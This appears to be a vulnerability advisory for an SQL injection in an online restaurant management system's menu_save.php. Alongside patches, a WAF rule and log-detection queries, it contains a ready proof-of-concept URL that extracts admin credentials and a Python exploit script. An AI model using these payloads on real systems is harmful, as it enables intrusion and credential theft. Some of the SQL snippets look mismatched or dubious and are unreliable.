How CVE-2025-3332 Works
The vulnerability exists in the `/admin/menu_save.php` file of Online Restaurant Management System 1.0 where user-supplied input in the `menu` parameter is directly concatenated into SQL queries without proper sanitization. Attackers can craft malicious SQL statements through this parameter, enabling unauthorized database access. The flaw allows remote exploitation without authentication (PR:N in CVSS), making it particularly dangerous. The SQL injection can lead to full database compromise, including extraction of admin credentials, menu items, and customer data. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) confirms the attack can be performed over the network with low complexity.
DailyCVE Form
Platform: Online Restaurant Management
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/07/2025
What Undercode Say:
```text
-- Exploit POC
/admin/menu_save.php?menu=1' UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7 FROM admins-- -
```
```python
# Automated Exploit Script
import requests

target = "http://victim-site.com/admin/menu_save.php"
payload = {"menu": "1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"}
r = requests.get(target, params=payload)
print(r.text)
```
```php
// Protection Patch
// Escape the value before it is placed inside the quoted SQL literal
$menu = mysqli_real_escape_string($conn, $_GET['menu']);
$query = "SELECT * FROM menus WHERE id = '$menu'";
```
```bash
# Detection Command
grep -r "menu_save.php" /var/www/html --include="*.php"
```
```apache
# WAF Rule to Block Exploit
SecRule ARGS:menu "@detectSQLi" "id:1001,deny,status:403,msg:'SQLi Attempt'"
```
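```sql
-- Database Cleanup After Exploit
DELETE FROM admins WHERE last_login LIKE '%sqlmap%';
ALTER TABLE admins ADD COLUMN salt VARCHAR(32);
-- Fill the salt first: CONCAT() with a NULL salt returns NULL and would blank every password
UPDATE admins SET salt = HEX(RANDOM_BYTES(16));
UPDATE admins SET password = SHA2(CONCAT(salt,password),512);
```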
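```sql
-- Post-Exploit Detection
-- general_log holds SQL statement text, not request URLs, so filter on the
-- table name from the patch above (needs general_log=ON and log_output=TABLE)
SELECT * FROM mysql.general_log
WHERE argument LIKE '%menus%' AND argument LIKE '%UNION%';
```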
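A log-triage sketch for the detection steps above, added here as an example and not part of the original advisory: it scans web access log lines for requests to `/admin/menu_save.php` whose `menu` value carries SQL syntax. The combined log format, the indicator patterns and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

ENDPOINT = "/admin/menu_save.php"  # script named in the advisory
PARAM = "menu"                     # injectable parameter named in the advisory

# Request part of a combined-format access log line (format is an assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Heuristic indicators of SQL syntax in a value that should be a plain id.
INDICATORS = {
    "quote": re.compile(r"['\"]"),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "sql_comment": re.compile(r"--|#|/\*"),
    "schema_probe": re.compile(r"information_schema", re.I),
}

def fully_decode(value, rounds=3):
    """Undo nested URL encoding such as %2527 -> %27 -> '."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def suspicious_requests(lines):
    """Return one record per request whose menu value carries SQL syntax."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        url = urlsplit(m["url"]) if m else None
        if url is None or not url.path.lower().endswith(ENDPOINT):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(raw)
            reasons = sorted(k for k, rx in INDICATORS.items() if rx.search(value))
            if reasons:
                hits.append({"ip": m["ip"], "time": m["ts"],
                             "status": int(m["status"]),
                             "value": value, "reasons": reasons})
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Apr/2025:10:01:02 +0000] "GET /admin/menu_save.php?menu=12 HTTP/1.1" 200 512',
    '198.51.100.7 - - [07/Apr/2025:10:03:44 +0000] "GET /admin/menu_save.php?menu=1%27%20UNION%20SELECT%201,2,3--%20- HTTP/1.1" 200 2048',
    '198.51.100.7 - - [07/Apr/2025:10:03:50 +0000] "GET /admin/menu_save.php?menu=1%2527%2520AND%25201%253D1 HTTP/1.1" 500 310',
    '203.0.113.5 - - [07/Apr/2025:10:05:00 +0000] "GET /index.php?menu=o%27brien HTTP/1.1" 200 900',
]
```

Access logs record only the query string, so a `menu` value sent in a POST body will not appear here; the WAF rule on `ARGS:menu` covers both.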
Mitigation Steps:
1. Update to version 1.1
2. Implement prepared statements
3. Apply least privilege to DB user
4. Enable WAF filtering
5. Audit all admin endpoints
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-3332
Extra Source Hub:
Undercode